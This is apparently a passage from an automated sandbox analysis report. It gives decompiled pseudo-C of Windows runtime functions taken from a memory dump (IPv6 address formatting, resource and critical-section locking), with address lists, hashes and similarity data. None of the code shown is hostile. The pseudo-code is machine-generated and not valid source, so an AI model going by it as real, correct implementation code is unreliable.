				_t24 =  *0x2052088; // 0x777e1dd7
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E01FA7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E01FB13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E01FA7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E01FA7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E01F72340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E01F7E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                        0x01fb14c0
                                                                                                                                                        0x01fb14cb
                                                                                                                                                        0x01fb14d2
                                                                                                                                                        0x01fb14d6
                                                                                                                                                        0x01fb14da
                                                                                                                                                        0x01fb14de
                                                                                                                                                        0x01fb14e3
                                                                                                                                                        0x01fb157a
                                                                                                                                                        0x01fb157a
                                                                                                                                                        0x01fb14f1
                                                                                                                                                        0x01fb14f3
                                                                                                                                                        0x01fdea0f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdea15
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdea15
                                                                                                                                                        0x01fb14f9
                                                                                                                                                        0x01fb14f9
                                                                                                                                                        0x01fb14fe
                                                                                                                                                        0x01fb1504
                                                                                                                                                        0x01fdea1a
                                                                                                                                                        0x01fdea1f
                                                                                                                                                        0x01fdea21
                                                                                                                                                        0x01fdea22
                                                                                                                                                        0x01fdea27
                                                                                                                                                        0x01fdea2a
                                                                                                                                                        0x01fdea2a
                                                                                                                                                        0x01fb1515
                                                                                                                                                        0x01fb1517
                                                                                                                                                        0x01fb156d
                                                                                                                                                        0x01fb1572
                                                                                                                                                        0x01fb1575
                                                                                                                                                        0x01fb1575
                                                                                                                                                        0x01fb151e
                                                                                                                                                        0x01fdea50
                                                                                                                                                        0x01fdea55
                                                                                                                                                        0x01fdea58
                                                                                                                                                        0x01fdea58
                                                                                                                                                        0x01fb152e
                                                                                                                                                        0x01fb1531
                                                                                                                                                        0x01fb1533
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb1535
                                                                                                                                                        0x01fb1541
                                                                                                                                                        0x01fb1549
                                                                                                                                                        0x01fb1549
                                                                                                                                                        0x01fb1533
                                                                                                                                                        0x01fb14f3
                                                                                                                                                        0x01fb1559

                                                                                                                                                        APIs
                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 01FDEA22
                                                                                                                                                          • Part of subcall function 01FB13CB: ___swprintf_l.LIBCMT ref: 01FB146B
                                                                                                                                                          • Part of subcall function 01FB13CB: ___swprintf_l.LIBCMT ref: 01FB1490
                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 01FB156D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                                                        • Opcode ID: c28f0c1e75e705fd1cc2c86c8c8257c98d578d6d30fde97edb8baa52d93be2a1
                                                                                                                                                        • Instruction ID: 0587b2148e4e7bb3f44ec491d290a49f399274eacb7b5176be005ba454a4dcb8
                                                                                                                                                        • Opcode Fuzzy Hash: c28f0c1e75e705fd1cc2c86c8c8257c98d578d6d30fde97edb8baa52d93be2a1
                                                                                                                                                        • Instruction Fuzzy Hash: 0921F572D0021ADBDB21EE59DC90AEF77ACBF50310F484116ED46D3100DB76EA588BE1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01F953A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 45%
                                                                                                                                                        			E01F953A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x020501c0;
									_push(_t92);
									_push(0);
									_t37 = E01F6F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E01FB4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E01FC3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E01FC3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E01FF217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01FC3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E01FB3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E01F95384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E01F6F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E01FB3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E01F6F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E01FB3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E01F6F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E01FB3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E01F95329(_t74, _t92);
													_push(1);
													_t48 = E01F953A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                                                                                                        0x01f953ab
                                                                                                                                                        0x01f953ae
                                                                                                                                                        0x01f953b1
                                                                                                                                                        0x01f953b4
                                                                                                                                                        0x01f953b7
                                                                                                                                                        0x01fb05b6
                                                                                                                                                        0x01fb05c0
                                                                                                                                                        0x01fb05c3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb05c9
                                                                                                                                                        0x01fb05c9
                                                                                                                                                        0x01fb05cc
                                                                                                                                                        0x01fb05d5
                                                                                                                                                        0x01fb05d5
                                                                                                                                                        0x01f953bd
                                                                                                                                                        0x01f953bd
                                                                                                                                                        0x01f953bd
                                                                                                                                                        0x01f953be
                                                                                                                                                        0x01f953be
                                                                                                                                                        0x01f953be
                                                                                                                                                        0x01f953c0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd2269
                                                                                                                                                        0x01fd226d
                                                                                                                                                        0x01fd2349
                                                                                                                                                        0x01fd234d
                                                                                                                                                        0x01fd2273
                                                                                                                                                        0x01fd2276
                                                                                                                                                        0x01fd2279
                                                                                                                                                        0x01fd227e
                                                                                                                                                        0x01fd2283
                                                                                                                                                        0x01fd2287
                                                                                                                                                        0x01fd228a
                                                                                                                                                        0x01fd228d
                                                                                                                                                        0x01fd228f
                                                                                                                                                        0x01fd22bc
                                                                                                                                                        0x01fd22bc
                                                                                                                                                        0x01fd22bc
                                                                                                                                                        0x01fd22be
                                                                                                                                                        0x01fd22c4
                                                                                                                                                        0x01fd22cc
                                                                                                                                                        0x01fd22d0
                                                                                                                                                        0x01fd22d6
                                                                                                                                                        0x01fd22d7
                                                                                                                                                        0x01fd22da
                                                                                                                                                        0x01fd22df
                                                                                                                                                        0x01fd22e4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd22e6
                                                                                                                                                        0x01fd22e9
                                                                                                                                                        0x01fd22f4
                                                                                                                                                        0x01fd22f9
                                                                                                                                                        0x01fd22fa
                                                                                                                                                        0x01fd2305
                                                                                                                                                        0x01fd2314
                                                                                                                                                        0x01fd2319
                                                                                                                                                        0x01fd231a
                                                                                                                                                        0x01fd231d
                                                                                                                                                        0x01fd2320
                                                                                                                                                        0x01fd2323
                                                                                                                                                        0x01fd2323
                                                                                                                                                        0x01fd2328
                                                                                                                                                        0x01fd232d
                                                                                                                                                        0x01fd232f
                                                                                                                                                        0x01fd2331
                                                                                                                                                        0x01fd2336
                                                                                                                                                        0x01fd2336
                                                                                                                                                        0x01fd233b
                                                                                                                                                        0x01fd233d
                                                                                                                                                        0x01fd2350
                                                                                                                                                        0x01fd2351
                                                                                                                                                        0x01fd2356
                                                                                                                                                        0x01fd2359
                                                                                                                                                        0x01fd2359
                                                                                                                                                        0x01fd235b
                                                                                                                                                        0x01fd235d
                                                                                                                                                        0x01f95367
                                                                                                                                                        0x01f9536b
                                                                                                                                                        0x01f95372
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd2363
                                                                                                                                                        0x01fd2363
                                                                                                                                                        0x01fd2369
                                                                                                                                                        0x01fd236a
                                                                                                                                                        0x01fd236c
                                                                                                                                                        0x01fd2371
                                                                                                                                                        0x01fd2373
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd2379
                                                                                                                                                        0x01fd2379
                                                                                                                                                        0x01fd237a
                                                                                                                                                        0x01fd237f
                                                                                                                                                        0x01fd237f
                                                                                                                                                        0x01fd2385
                                                                                                                                                        0x01fd2386
                                                                                                                                                        0x01fd2389
                                                                                                                                                        0x01fd238e
                                                                                                                                                        0x01fd2390
                                                                                                                                                        0x01f95378
                                                                                                                                                        0x01f9537c
                                                                                                                                                        0x01fd2396
                                                                                                                                                        0x01fd2396
                                                                                                                                                        0x01fd2397
                                                                                                                                                        0x01fd239c
                                                                                                                                                        0x01fd23a2
                                                                                                                                                        0x01fd23a3
                                                                                                                                                        0x01fd23a6
                                                                                                                                                        0x01fd23ab
                                                                                                                                                        0x01fd23ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd23b3
                                                                                                                                                        0x01fd23b3
                                                                                                                                                        0x01fd23b4
                                                                                                                                                        0x01fd23b9
                                                                                                                                                        0x01fd23ba
                                                                                                                                                        0x01fd23ba
                                                                                                                                                        0x01fd23bc
                                                                                                                                                        0x01fd23bf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fc9153
                                                                                                                                                        0x01fc9158
                                                                                                                                                        0x01fc915a
                                                                                                                                                        0x01fc915e
                                                                                                                                                        0x01fc9160
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fc9166
                                                                                                                                                        0x01fc9166
                                                                                                                                                        0x01fc9171
                                                                                                                                                        0x01fc9176
                                                                                                                                                        0x01fc9176
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fc9160
                                                                                                                                                        0x01fd23c6
                                                                                                                                                        0x01fd23cb
                                                                                                                                                        0x01fd23ce
                                                                                                                                                        0x01fd23d7
                                                                                                                                                        0x01fd23d7
                                                                                                                                                        0x01fd23ad
                                                                                                                                                        0x01fd2390
                                                                                                                                                        0x01fd2373
                                                                                                                                                        0x01fd233f
                                                                                                                                                        0x01fd233f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd233f
                                                                                                                                                        0x01fd2291
                                                                                                                                                        0x01fd2291
                                                                                                                                                        0x01fd2293
                                                                                                                                                        0x01fd2295
                                                                                                                                                        0x01fd229a
                                                                                                                                                        0x01fd22a1
                                                                                                                                                        0x01fd22a3
                                                                                                                                                        0x01fd22a7
                                                                                                                                                        0x01fd22a9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd22ab
                                                                                                                                                        0x01fd22ad
                                                                                                                                                        0x01fd22af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd22af
                                                                                                                                                        0x01fd22b1
                                                                                                                                                        0x01fd22b4
                                                                                                                                                        0x01fd22b4
                                                                                                                                                        0x01fd22b6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd22b6
                                                                                                                                                        0x01fd228f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd226d
                                                                                                                                                        0x01f953cb
                                                                                                                                                        0x01f953ce
                                                                                                                                                        0x01f953d0
                                                                                                                                                        0x01f953d4
                                                                                                                                                        0x01f953d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f953d8
                                                                                                                                                        0x01f953e3
                                                                                                                                                        0x01f953ea
                                                                                                                                                        0x01f953ea
                                                                                                                                                        0x01f953d6
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01FD22F4
                                                                                                                                                        Strings
                                                                                                                                                        • RTL: Re-Waiting, xrefs: 01FD2328
                                                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01FD22FC
                                                                                                                                                        • RTL: Resource at %p, xrefs: 01FD230B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                        • API String ID: 885266447-871070163
                                                                                                                                                        • Opcode ID: 7511a732a47184f58b5645fc75e46045e6560067b854e1584e3e8330e8d2b8c7
                                                                                                                                                        • Instruction ID: 2c4241de30dbebbddd55ece1904ee2d3fd49680e524526eb2bec6d766e840e29
                                                                                                                                                        • Opcode Fuzzy Hash: 7511a732a47184f58b5645fc75e46045e6560067b854e1584e3e8330e8d2b8c7
                                                                                                                                                        • Instruction Fuzzy Hash: D051F971600707ABEF16EF29DC80FA673AAAF54720F10461AFD45DB255EA63E84187D0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01F9EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                        			E01F9EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E01F8DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x205793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E01F716C0(_t39);
				} else {
					_t40 = E01F6F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E01FB3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E01F701A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x205793c; // 0x0
								_push(_t85);
								_t44 = E01F71F28(_t71);
							} else {
								_t44 = E01F6F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E01FB3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E01FF2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E01F9EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E01FB4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E01FC3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E01FC3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x20520c0;
								if(_t85 != 0x20520c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E01FF217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E01FC3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                                                                                        0x01f9ec56
                                                                                                                                                        0x01f9ec56
                                                                                                                                                        0x01f9ec56
                                                                                                                                                        0x01f9ec5c
                                                                                                                                                        0x01f9ec64
                                                                                                                                                        0x01fd23e6
                                                                                                                                                        0x01fd23eb
                                                                                                                                                        0x01fd23eb
                                                                                                                                                        0x01f9ec6a
                                                                                                                                                        0x01f9ec6c
                                                                                                                                                        0x01f9ec6f
                                                                                                                                                        0x01fd23f3
                                                                                                                                                        0x01fd23f8
                                                                                                                                                        0x01fd23fa
                                                                                                                                                        0x01fd23fc
                                                                                                                                                        0x01f9ec75
                                                                                                                                                        0x01f9ec76
                                                                                                                                                        0x01f9ec76
                                                                                                                                                        0x01f9ec7b
                                                                                                                                                        0x01f9ec7c
                                                                                                                                                        0x01f9ec7e
                                                                                                                                                        0x01fd2406
                                                                                                                                                        0x01fd2407
                                                                                                                                                        0x01fd240c
                                                                                                                                                        0x01fd240d
                                                                                                                                                        0x01fd240d
                                                                                                                                                        0x01fd240d
                                                                                                                                                        0x01fd2414
                                                                                                                                                        0x01fd2417
                                                                                                                                                        0x01fd241e
                                                                                                                                                        0x01fd2435
                                                                                                                                                        0x01fd2438
                                                                                                                                                        0x01fd243c
                                                                                                                                                        0x01fd243f
                                                                                                                                                        0x01fd2442
                                                                                                                                                        0x01fd2443
                                                                                                                                                        0x01fd2446
                                                                                                                                                        0x01fd2449
                                                                                                                                                        0x01fd2453
                                                                                                                                                        0x01fd2455
                                                                                                                                                        0x01fd245b
                                                                                                                                                        0x01fd245b
                                                                                                                                                        0x01f9eb99
                                                                                                                                                        0x01f9eb99
                                                                                                                                                        0x01f9eb9c
                                                                                                                                                        0x01f9eb9d
                                                                                                                                                        0x01f9eb9f
                                                                                                                                                        0x01f9eba2
                                                                                                                                                        0x01fd2465
                                                                                                                                                        0x01fd246b
                                                                                                                                                        0x01fd246d
                                                                                                                                                        0x01f9eba8
                                                                                                                                                        0x01f9eba9
                                                                                                                                                        0x01f9eba9
                                                                                                                                                        0x01f9ebae
                                                                                                                                                        0x01f9ebb3
                                                                                                                                                        0x01f9ebb9
                                                                                                                                                        0x01f9ebbb
                                                                                                                                                        0x01fd2513
                                                                                                                                                        0x01fd2514
                                                                                                                                                        0x01fd2519
                                                                                                                                                        0x01fd251b
                                                                                                                                                        0x01f9ec2a
                                                                                                                                                        0x01f9ec2d
                                                                                                                                                        0x01f9ec33
                                                                                                                                                        0x01f9ec36
                                                                                                                                                        0x01f9ec3a
                                                                                                                                                        0x01f9ec3e
                                                                                                                                                        0x01f9ec40
                                                                                                                                                        0x01f9ec47
                                                                                                                                                        0x01f9ec47
                                                                                                                                                        0x01f9ec40
                                                                                                                                                        0x01f722c6
                                                                                                                                                        0x01f9ebc1
                                                                                                                                                        0x01f9ebc1
                                                                                                                                                        0x01f9ebc5
                                                                                                                                                        0x01f9ec9a
                                                                                                                                                        0x01f9ec9a
                                                                                                                                                        0x01f9ebd6
                                                                                                                                                        0x01f9ebd6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f9ebbb
                                                                                                                                                        0x01fd2477
                                                                                                                                                        0x01fd247c
                                                                                                                                                        0x01fd2486
                                                                                                                                                        0x01fd248b
                                                                                                                                                        0x01fd2496
                                                                                                                                                        0x01fd249b
                                                                                                                                                        0x01fd249d
                                                                                                                                                        0x01fd24a0
                                                                                                                                                        0x01fd24a3
                                                                                                                                                        0x01fd24aa
                                                                                                                                                        0x01fd24aa
                                                                                                                                                        0x01fd24a5
                                                                                                                                                        0x01fd24a5
                                                                                                                                                        0x01fd24a5
                                                                                                                                                        0x01fd24ac
                                                                                                                                                        0x01fd24af
                                                                                                                                                        0x01fd24b0
                                                                                                                                                        0x01fd24b3
                                                                                                                                                        0x01fd24b9
                                                                                                                                                        0x01fd24ba
                                                                                                                                                        0x01fd24bb
                                                                                                                                                        0x01fd24c6
                                                                                                                                                        0x01fd24cb
                                                                                                                                                        0x01fd24cd
                                                                                                                                                        0x01fd24d0
                                                                                                                                                        0x01fd24d1
                                                                                                                                                        0x01fd24d4
                                                                                                                                                        0x01fd24d6
                                                                                                                                                        0x01fd24d9
                                                                                                                                                        0x01fd24d9
                                                                                                                                                        0x01fd24dc
                                                                                                                                                        0x01fd24df
                                                                                                                                                        0x01fd24e1
                                                                                                                                                        0x01fd24e7
                                                                                                                                                        0x01fd24e9
                                                                                                                                                        0x01fd24ec
                                                                                                                                                        0x01fd24ef
                                                                                                                                                        0x01fd24f2
                                                                                                                                                        0x01fd24f2
                                                                                                                                                        0x01fd24ef
                                                                                                                                                        0x01fd24e7
                                                                                                                                                        0x01fd24fa
                                                                                                                                                        0x01fd24ff
